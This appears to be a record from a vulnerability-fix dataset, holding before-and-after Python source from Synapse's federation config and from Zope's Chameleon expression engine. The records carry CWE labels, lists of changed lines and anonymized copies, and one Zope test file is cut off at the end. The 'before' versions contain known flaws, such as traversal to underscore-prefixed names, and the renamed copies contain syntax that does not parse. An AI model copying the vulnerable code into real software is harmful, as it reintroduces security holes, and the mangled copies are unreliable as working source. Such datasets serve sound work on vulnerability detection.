| # -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from netaddr import IPSet
from synapse.config._base import Config, ConfigError
from synapse.config._util import validate_config
class FederationConfig(Config):
section = "federation"
def read_config(self, config, **kwargs):
# FIXME: federation_domain_whitelist needs sytests
self.federation_domain_whitelist = None # type: Optional[dict]
federation_domain_whitelist = config.get("federation_domain_whitelist", None)
if federation_domain_whitelist is not None:
# turn the whitelist into a hash for speed of lookup
self.federation_domain_whitelist = {}
for domain in federation_domain_whitelist:
self.federation_domain_whitelist[domain] = True
ip_range_blacklist = config.get("ip_range_blacklist", [])
# Attempt to create an IPSet from the given ranges
try:
self.ip_range_blacklist = IPSet(ip_range_blacklist)
except Exception as e:
raise ConfigError("Invalid range(s) provided in ip_range_blacklist: %s" % e)
# Always blacklist 0.0.0.0, ::
self.ip_range_blacklist.update(["0.0.0.0", "::"])
# The federation_ip_range_blacklist is used for backwards-compatibility
# and only applies to federation and identity servers. If it is not given,
# default to ip_range_blacklist.
federation_ip_range_blacklist = config.get(
"federation_ip_range_blacklist", ip_range_blacklist
)
try:
self.federation_ip_range_blacklist = IPSet(federation_ip_range_blacklist)
except Exception as e:
raise ConfigError(
"Invalid range(s) provided in federation_ip_range_blacklist: %s" % e
)
# Always blacklist 0.0.0.0, ::
self.federation_ip_range_blacklist.update(["0.0.0.0", "::"])
federation_metrics_domains = config.get("federation_metrics_domains") or []
validate_config(
_METRICS_FOR_DOMAINS_SCHEMA,
federation_metrics_domains,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(federation_metrics_domains)
def generate_config_section(self, config_dir_path, server_name, **kwargs):
return """\
## Federation ##
# Restrict federation to the following whitelist of domains.
# N.B. we recommend also firewalling your federation listener to limit
# inbound federation traffic as early as possible, rather than relying
# purely on this application-layer restriction. If not specified, the
# default is to whitelist everything.
#
#federation_domain_whitelist:
# - lon.example.com
# - nyc.example.com
# - syd.example.com
# Prevent outgoing requests from being sent to the following blacklisted IP address
# CIDR ranges. If this option is not specified, or specified with an empty list,
# no IP range blacklist will be enforced.
#
# The blacklist applies to the outbound requests for federation, identity servers,
# push servers, and for checking key validitity for third-party invite events.
#
# (0.0.0.0 and :: are always blacklisted, whether or not they are explicitly
# listed here, since they correspond to unroutable addresses.)
#
# This option replaces federation_ip_range_blacklist in Synapse v1.24.0.
#
ip_range_blacklist:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '100.64.0.0/10'
- '169.254.0.0/16'
- '::1/128'
- 'fe80::/64'
- 'fc00::/7'
# Report prometheus metrics on the age of PDUs being sent to and received from
# the following domains. This can be used to give an idea of "delay" on inbound
# and outbound federation, though be aware that any delay can be due to problems
# at either end or with the intermediate network.
#
# By default, no domains are monitored in this way.
#
#federation_metrics_domains:
# - matrix.org
# - example.com
"""
_METRICS_FOR_DOMAINS_SCHEMA = {"type": "array", "items": {"type": "string"}}
| open_redirect | {
"code": [
" self.federation_ip_range_blacklist = config.get(",
" \"federation_ip_range_blacklist\", []",
" )",
" self.federation_ip_range_blacklist = IPSet(",
" self.federation_ip_range_blacklist",
" )",
" self.federation_ip_range_blacklist.update([\"0.0.0.0\", \"::\"])",
" federation_ip_range_blacklist:"
],
"line_no": [
39,
40,
41,
45,
46,
47,
50,
89
]
} | {
"code": [
" ip_range_blacklist = config.get(\"ip_range_blacklist\", [])",
" except Exception as e:",
" raise ConfigError(\"Invalid range(s) provided in ip_range_blacklist: %s\" % e)",
" self.ip_range_blacklist.update([\"0.0.0.0\", \"::\"])",
" federation_ip_range_blacklist = config.get(",
" \"federation_ip_range_blacklist\", ip_range_blacklist",
" )",
" self.federation_ip_range_blacklist = IPSet(federation_ip_range_blacklist)",
" self.federation_ip_range_blacklist.update([\"0.0.0.0\", \"::\"])"
],
"line_no": [
39,
44,
45,
47,
52,
53,
54,
56,
62
]
} |
from typing import Optional
from netaddr import IPSet
from synapse.config._base import Config, ConfigError
from synapse.config._util import validate_config
class CLASS_0(Config):
VAR_1 = "federation"
def FUNC_0(self, VAR_2, **VAR_3):
self.federation_domain_whitelist = None # type: Optional[dict]
VAR_6 = VAR_2.get("federation_domain_whitelist", None)
if VAR_6 is not None:
self.federation_domain_whitelist = {}
for VAR_8 in VAR_6:
self.federation_domain_whitelist[VAR_8] = True
self.federation_ip_range_blacklist = VAR_2.get(
"federation_ip_range_blacklist", []
)
try:
self.federation_ip_range_blacklist = IPSet(
self.federation_ip_range_blacklist
)
self.federation_ip_range_blacklist.update(["0.0.0.0", "::"])
except Exception as e:
raise ConfigError(
"Invalid range(s) provided in federation_ip_range_blacklist: %s" % e
)
VAR_7 = VAR_2.get("federation_metrics_domains") or []
validate_config(
VAR_0,
VAR_7,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(VAR_7)
def FUNC_1(self, VAR_4, VAR_5, **VAR_3):
return """\
federation_ip_range_blacklist:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '100.64.0.0/10'
- '169.254.0.0/16'
- '::1/128'
- 'fe80::/64'
- 'fc00::/7'
"""
VAR_0 = {"type": "array", "items": {"type": "string"}}
|
from typing import Optional
from netaddr import IPSet
from synapse.config._base import Config, ConfigError
from synapse.config._util import validate_config
class CLASS_0(Config):
VAR_1 = "federation"
def FUNC_0(self, VAR_2, **VAR_3):
self.federation_domain_whitelist = None # type: Optional[dict]
VAR_6 = VAR_2.get("federation_domain_whitelist", None)
if VAR_6 is not None:
self.federation_domain_whitelist = {}
for VAR_10 in VAR_6:
self.federation_domain_whitelist[VAR_10] = True
VAR_7 = VAR_2.get("ip_range_blacklist", [])
try:
self.ip_range_blacklist = IPSet(VAR_7)
except Exception as e:
raise ConfigError("Invalid range(s) provided in VAR_7: %s" % e)
self.ip_range_blacklist.update(["0.0.0.0", "::"])
VAR_8 = VAR_2.get(
"federation_ip_range_blacklist", VAR_7
)
try:
self.federation_ip_range_blacklist = IPSet(VAR_8)
except Exception as e:
raise ConfigError(
"Invalid range(s) provided in VAR_8: %s" % e
)
self.federation_ip_range_blacklist.update(["0.0.0.0", "::"])
VAR_9 = VAR_2.get("federation_metrics_domains") or []
validate_config(
VAR_0,
VAR_9,
("federation_metrics_domains",),
)
self.federation_metrics_domains = set(VAR_9)
def FUNC_1(self, VAR_4, VAR_5, **VAR_3):
return """\
VAR_7:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '100.64.0.0/10'
- '169.254.0.0/16'
- '::1/128'
- 'fe80::/64'
- 'fc00::/7'
"""
VAR_0 = {"type": "array", "items": {"type": "string"}}
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
19,
22,
23,
26,
28,
31,
33,
35,
38,
42,
43,
48,
49,
55,
63,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
81,
82,
83,
84,
85,
86,
87,
88,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
111,
112,
114
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
19,
22,
23,
26,
28,
31,
33,
35,
38,
40,
41,
46,
48,
49,
50,
51,
61,
63,
71,
74,
75,
76,
77,
78,
79,
80,
81,
82,
83,
84,
85,
86,
87,
88,
89,
90,
91,
92,
93,
94,
95,
96,
97,
98,
109,
110,
111,
112,
113,
114,
115,
116,
117,
118,
119,
121,
122,
124
] |
0CWE-22
| """``chameleon.tales`` expressions."""
from ast import NodeTransformer
from ast import parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
_marker = object()
zope2_exceptions = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def static(obj):
return Static(template("obj", obj=Symbol(obj), mode="eval"))
class BoboAwareZopeTraverse:
traverse_method = 'restrictedTraverse'
__slots__ = ()
@classmethod
def traverse(cls, base, request, path_items):
"""See ``zope.app.pagetemplate.engine``."""
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if ITraversable.providedBy(base):
base = getattr(base, cls.traverseMethod)(name)
else:
base = traversePathElement(base, name, path_items,
request=request)
return base
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
if path_items:
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
callable(base):
base = render(base, econtext)
return base
class TrustedBoboAwareZopeTraverse(BoboAwareZopeTraverse):
traverse_method = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
isinstance(base, type):
return base()
return base
class PathExpr(expressions.PathExpr):
exceptions = zope2_exceptions
traverser = Static(template(
"cls()", cls=Symbol(BoboAwareZopeTraverse), mode="eval"
))
class TrustedPathExpr(PathExpr):
traverser = Static(template(
"cls()", cls=Symbol(TrustedBoboAwareZopeTraverse), mode="eval"
))
class NocallExpr(expressions.NocallExpr, PathExpr):
pass
class ExistsExpr(expressions.ExistsExpr):
exceptions = zope2_exceptions
class RestrictionTransform(NodeTransformer):
secured = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def visit_Name(self, node):
value = self.secured.get(node.id)
if value is not None:
return Symbol(value)
return node
class UntrustedPythonExpr(expressions.PythonExpr):
restricted_python_transformer = RestrictingNodeTransformer()
page_templates_expression_transformer = RestrictionTransform()
# Make copy of parent expression builtins
builtins = expressions.PythonExpr.builtins.copy()
# Update builtins with Restricted Python utility builtins
builtins.update({
name: static(builtin) for (name, builtin) in utility_builtins.items()
})
def parse(self, string):
encoded = string.encode('utf-8')
node = parse(encoded, mode='eval')
# Run Node Transformation from RestrictedPython:
self.restricted_python_transformer.visit(node)
# Run PageTemplate.expression RestrictedPython Transform:
self.page_templates_expression_transformer.visit(node)
return node
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ChameleonEngine(ExpressionEngine):
"""Expression engine for ``chameleon.tales``.
Only partially implemented: its ``compile`` is currently unusable
"""
def compile(self, expression):
raise NotImplementedError()
types = dict(
python=UntrustedPythonExpr,
string=StringExpr,
not_=NotExpr,
exists=ExistsExpr,
path=PathExpr,
provider=expressions.ProviderExpr,
nocall=NocallExpr)
def createChameleonEngine(types=types, untrusted=True, **overrides):
e = ChameleonEngine()
def norm(k):
return k[:-1] if k.endswith("_") else k
e.untrusted = untrusted
ts = e.types
for k, v in types.items():
k = norm(k)
e.registerType(k, v)
for k, v in overrides.items():
k = norm(k)
if k in ts:
del ts[k]
e.registerType(k, v)
return e
def createTrustedChameleonEngine(**overrides):
ovr = dict(python=expressions.PythonExpr, path=TrustedPathExpr)
ovr.update(overrides)
return createChameleonEngine(untrusted=False, **ovr)
_engine = createChameleonEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedChameleonEngine()
def getTrustedEngine():
return _trusted_engine
| """``chameleon.tales`` expressions."""
import warnings
from ast import NodeTransformer
from ast import parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
_marker = object()
zope2_exceptions = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def static(obj):
return Static(template("obj", obj=Symbol(obj), mode="eval"))
class BoboAwareZopeTraverse:
traverse_method = 'restrictedTraverse'
__slots__ = ()
@classmethod
def traverse(cls, base, request, path_items):
"""See ``zope.app.pagetemplate.engine``."""
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if name == '_':
warnings.warn('Traversing to the name `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif name.startswith('_'):
raise NotFound(name)
if ITraversable.providedBy(base):
base = getattr(base, cls.traverse_method)(name)
else:
base = traversePathElement(base, name, path_items,
request=request)
return base
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
if path_items:
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
callable(base):
base = render(base, econtext)
return base
class TrustedBoboAwareZopeTraverse(BoboAwareZopeTraverse):
traverse_method = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
isinstance(base, type):
return base()
return base
class PathExpr(expressions.PathExpr):
exceptions = zope2_exceptions
traverser = Static(template(
"cls()", cls=Symbol(BoboAwareZopeTraverse), mode="eval"
))
class TrustedPathExpr(PathExpr):
traverser = Static(template(
"cls()", cls=Symbol(TrustedBoboAwareZopeTraverse), mode="eval"
))
class NocallExpr(expressions.NocallExpr, PathExpr):
pass
class ExistsExpr(expressions.ExistsExpr):
exceptions = zope2_exceptions
class RestrictionTransform(NodeTransformer):
secured = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def visit_Name(self, node):
value = self.secured.get(node.id)
if value is not None:
return Symbol(value)
return node
class UntrustedPythonExpr(expressions.PythonExpr):
restricted_python_transformer = RestrictingNodeTransformer()
page_templates_expression_transformer = RestrictionTransform()
# Make copy of parent expression builtins
builtins = expressions.PythonExpr.builtins.copy()
# Update builtins with Restricted Python utility builtins
builtins.update({
name: static(builtin) for (name, builtin) in utility_builtins.items()
})
def parse(self, string):
encoded = string.encode('utf-8')
node = parse(encoded, mode='eval')
# Run Node Transformation from RestrictedPython:
self.restricted_python_transformer.visit(node)
# Run PageTemplate.expression RestrictedPython Transform:
self.page_templates_expression_transformer.visit(node)
return node
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ChameleonEngine(ExpressionEngine):
"""Expression engine for ``chameleon.tales``.
Only partially implemented: its ``compile`` is currently unusable
"""
def compile(self, expression):
raise NotImplementedError()
types = dict(
python=UntrustedPythonExpr,
string=StringExpr,
not_=NotExpr,
exists=ExistsExpr,
path=PathExpr,
provider=expressions.ProviderExpr,
nocall=NocallExpr)
def createChameleonEngine(types=types, untrusted=True, **overrides):
e = ChameleonEngine()
def norm(k):
return k[:-1] if k.endswith("_") else k
e.untrusted = untrusted
ts = e.types
for k, v in types.items():
k = norm(k)
e.registerType(k, v)
for k, v in overrides.items():
k = norm(k)
if k in ts:
del ts[k]
e.registerType(k, v)
return e
def createTrustedChameleonEngine(**overrides):
ovr = dict(python=expressions.PythonExpr, path=TrustedPathExpr)
ovr.update(overrides)
return createChameleonEngine(untrusted=False, **ovr)
_engine = createChameleonEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedChameleonEngine()
def getTrustedEngine():
return _trusted_engine
| path_disclosure | {
"code": [
" base = getattr(base, cls.traverseMethod)(name)"
],
"line_no": [
65
]
} | {
"code": [
"import warnings",
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" 'and will be removed in Zope 6.',",
" elif name.startswith('_'):",
" base = getattr(base, cls.traverse_method)(name)"
],
"line_no": [
3,
66,
67,
68,
70,
74
]
} |
from ast import NodeTransformer
from ast import .parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import .expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
VAR_0 = object()
VAR_1 = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def FUNC_0(VAR_2):
return Static(template("obj", VAR_2=Symbol(VAR_2), mode="eval"))
class CLASS_0:
VAR_8 = 'restrictedTraverse'
__slots__ = ()
@classmethod
def FUNC_5(VAR_9, VAR_10, VAR_11, VAR_12):
VAR_12 = list(VAR_12)
path_items.reverse()
while VAR_12:
VAR_30 = VAR_12.pop()
if ITraversable.providedBy(VAR_10):
VAR_10 = getattr(VAR_10, VAR_9.traverseMethod)(VAR_30)
else:
VAR_10 = traversePathElement(VAR_10, VAR_30, VAR_12,
VAR_11=request)
return VAR_10
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
if VAR_12:
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
callable(VAR_10):
VAR_10 = render(VAR_10, VAR_13)
return VAR_10
class CLASS_1(CLASS_0):
VAR_8 = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
isinstance(VAR_10, type):
return VAR_10()
return VAR_10
class CLASS_2(expressions.PathExpr):
VAR_15 = VAR_1
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_0), mode="eval"
))
class CLASS_3(CLASS_2):
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_1), mode="eval"
))
class CLASS_4(expressions.NocallExpr, CLASS_2):
pass
class CLASS_5(expressions.ExistsExpr):
VAR_15 = VAR_1
class CLASS_6(NodeTransformer):
VAR_17 = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def FUNC_6(self, VAR_18):
VAR_28 = self.secured.get(VAR_18.id)
if VAR_28 is not None:
return Symbol(VAR_28)
return VAR_18
class CLASS_7(expressions.PythonExpr):
VAR_19 = RestrictingNodeTransformer()
VAR_20 = CLASS_6()
VAR_21 = expressions.PythonExpr.builtins.copy()
builtins.update({
VAR_30: FUNC_0(builtin) for (VAR_30, builtin) in utility_builtins.items()
})
def FUNC_7(self, VAR_22):
VAR_29 = VAR_22.encode('utf-8')
VAR_18 = FUNC_7(VAR_29, mode='eval')
self.restricted_python_transformer.visit(VAR_18)
self.page_templates_expression_transformer.visit(VAR_18)
return VAR_18
@implementer(IZopeAwareEngine)
class CLASS_8(ExpressionEngine):
def FUNC_8(self, VAR_23):
raise NotImplementedError()
VAR_3 = dict(
python=CLASS_7,
VAR_22=StringExpr,
not_=NotExpr,
exists=CLASS_5,
path=CLASS_2,
provider=expressions.ProviderExpr,
nocall=CLASS_4)
def FUNC_1(VAR_3=types, VAR_4=True, **VAR_5):
VAR_24 = CLASS_8()
def FUNC_9(VAR_25):
return VAR_25[:-1] if VAR_25.endswith("_") else VAR_25
VAR_24.untrusted = VAR_4
VAR_26 = VAR_24.types
for VAR_25, v in VAR_3.items():
VAR_25 = FUNC_9(VAR_25)
VAR_24.registerType(VAR_25, v)
for VAR_25, v in VAR_5.items():
VAR_25 = FUNC_9(VAR_25)
if VAR_25 in VAR_26:
del VAR_26[VAR_25]
VAR_24.registerType(VAR_25, v)
return VAR_24
def FUNC_2(**VAR_5):
VAR_27 = dict(python=expressions.PythonExpr, path=CLASS_3)
VAR_27.update(VAR_5)
return FUNC_1(VAR_4=False, **VAR_27)
VAR_6 = FUNC_1()
def FUNC_3():
return VAR_6
VAR_7 = FUNC_2()
def FUNC_4():
return VAR_7
|
import warnings
from ast import NodeTransformer
from ast import .parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import .expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
VAR_0 = object()
VAR_1 = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def FUNC_0(VAR_2):
return Static(template("obj", VAR_2=Symbol(VAR_2), mode="eval"))
class CLASS_0:
VAR_8 = 'restrictedTraverse'
__slots__ = ()
@classmethod
def FUNC_5(VAR_9, VAR_10, VAR_11, VAR_12):
VAR_12 = list(VAR_12)
path_items.reverse()
while VAR_12:
VAR_30 = VAR_12.pop()
if VAR_30 == '_':
warnings.warn('Traversing to the VAR_30 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif VAR_30.startswith('_'):
raise NotFound(VAR_30)
if ITraversable.providedBy(VAR_10):
VAR_10 = getattr(VAR_10, VAR_9.traverse_method)(VAR_30)
else:
VAR_10 = traversePathElement(VAR_10, VAR_30, VAR_12,
VAR_11=request)
return VAR_10
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
if VAR_12:
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
callable(VAR_10):
VAR_10 = render(VAR_10, VAR_13)
return VAR_10
class CLASS_1(CLASS_0):
VAR_8 = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
isinstance(VAR_10, type):
return VAR_10()
return VAR_10
class CLASS_2(expressions.PathExpr):
VAR_15 = VAR_1
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_0), mode="eval"
))
class CLASS_3(CLASS_2):
VAR_16 = Static(template(
"cls()", VAR_9=Symbol(CLASS_1), mode="eval"
))
class CLASS_4(expressions.NocallExpr, CLASS_2):
pass
class CLASS_5(expressions.ExistsExpr):
VAR_15 = VAR_1
class CLASS_6(NodeTransformer):
VAR_17 = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def FUNC_6(self, VAR_18):
VAR_28 = self.secured.get(VAR_18.id)
if VAR_28 is not None:
return Symbol(VAR_28)
return VAR_18
class CLASS_7(expressions.PythonExpr):
VAR_19 = RestrictingNodeTransformer()
VAR_20 = CLASS_6()
VAR_21 = expressions.PythonExpr.builtins.copy()
builtins.update({
VAR_30: FUNC_0(builtin) for (VAR_30, builtin) in utility_builtins.items()
})
def FUNC_7(self, VAR_22):
VAR_29 = VAR_22.encode('utf-8')
VAR_18 = FUNC_7(VAR_29, mode='eval')
self.restricted_python_transformer.visit(VAR_18)
self.page_templates_expression_transformer.visit(VAR_18)
return VAR_18
@implementer(IZopeAwareEngine)
class CLASS_8(ExpressionEngine):
def FUNC_8(self, VAR_23):
raise NotImplementedError()
VAR_3 = dict(
python=CLASS_7,
VAR_22=StringExpr,
not_=NotExpr,
exists=CLASS_5,
path=CLASS_2,
provider=expressions.ProviderExpr,
nocall=CLASS_4)
def FUNC_1(VAR_3=types, VAR_4=True, **VAR_5):
VAR_24 = CLASS_8()
def FUNC_9(VAR_25):
return VAR_25[:-1] if VAR_25.endswith("_") else VAR_25
VAR_24.untrusted = VAR_4
VAR_26 = VAR_24.types
for VAR_25, v in VAR_3.items():
VAR_25 = FUNC_9(VAR_25)
VAR_24.registerType(VAR_25, v)
for VAR_25, v in VAR_5.items():
VAR_25 = FUNC_9(VAR_25)
if VAR_25 in VAR_26:
del VAR_26[VAR_25]
VAR_24.registerType(VAR_25, v)
return VAR_24
def FUNC_2(**VAR_5):
VAR_27 = dict(python=expressions.PythonExpr, path=CLASS_3)
VAR_27.update(VAR_5)
return FUNC_1(VAR_4=False, **VAR_27)
VAR_6 = FUNC_1()
def FUNC_3():
return VAR_6
VAR_7 = FUNC_2()
def FUNC_4():
return VAR_7
| [
2,
5,
11,
27,
30,
31,
33,
44,
45,
48,
49,
52,
54,
58,
61,
69,
71,
74,
77,
80,
84,
86,
87,
90,
92,
95,
97,
100,
104,
106,
107,
110,
114,
115,
120,
121,
124,
125,
128,
129,
138,
143,
145,
146,
150,
151,
153,
154,
158,
162,
163,
165,
166,
168,
170,
171,
172,
173,
174,
175,
176,
180,
185,
186,
195,
196,
199,
202,
214,
215,
220,
221,
223,
224,
227,
228,
230,
231,
234,
1,
179,
180,
181,
182,
57
] | [
2,
6,
12,
28,
31,
32,
34,
45,
46,
49,
50,
53,
55,
59,
62,
65,
72,
78,
80,
83,
86,
89,
93,
95,
96,
99,
101,
104,
106,
109,
113,
115,
116,
119,
123,
124,
129,
130,
133,
134,
137,
138,
147,
152,
154,
155,
159,
160,
162,
163,
167,
171,
172,
174,
175,
177,
179,
180,
181,
182,
183,
184,
185,
189,
194,
195,
204,
205,
208,
211,
223,
224,
229,
230,
232,
233,
236,
237,
239,
240,
243,
1,
188,
189,
190,
191,
58
] |
0CWE-22
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
class EngineTestsBase(PlacelessSetup):
def setUp(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def tearDown(self):
PlacelessSetup.tearDown(self)
def _makeEngine(self):
# subclasses must override
raise NotImplementedError
def _makeContext(self, bindings=None):
class Dummy:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class DummyDocumentTemplate:
__allow_access_to_unprotected_subobjects__ = 1
isDocTemp = True
def __call__(self, client=None, REQUEST={}, RESPONSE=None, **kw):
return 'dummy'
def absolute_url(self, relative=0):
url = 'dummy'
if not relative:
url = "http://server/" + url
return url
_DEFAULT_BINDINGS = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
dummy=Dummy(),
dummy2=DummyDocumentTemplate(),
eightbit=b'\xe4\xfc\xf6',
# ZopeContext needs 'context' and 'template' keys for unicode
# conflict resolution
context=Dummy(),
template=DummyDocumentTemplate(),
)
if bindings is None:
bindings = _DEFAULT_BINDINGS
return self._makeEngine().getContext(bindings)
def test_compile(self):
# Test expression compilation
e = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
e.compile(p)
e.compile('path:a|b|c/d/e')
e.compile('string:Fred')
e.compile('string:A$B')
e.compile('string:a ${x/y} b ${y/z} c')
e.compile('python: 2 + 2')
e.compile('python: 2 \n+\n 2\n')
def test_evaluate_simple_path_binding(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('one'), 1)
def test_evaluate_simple_path_dict_key_int_value(self):
ec = self._makeContext()
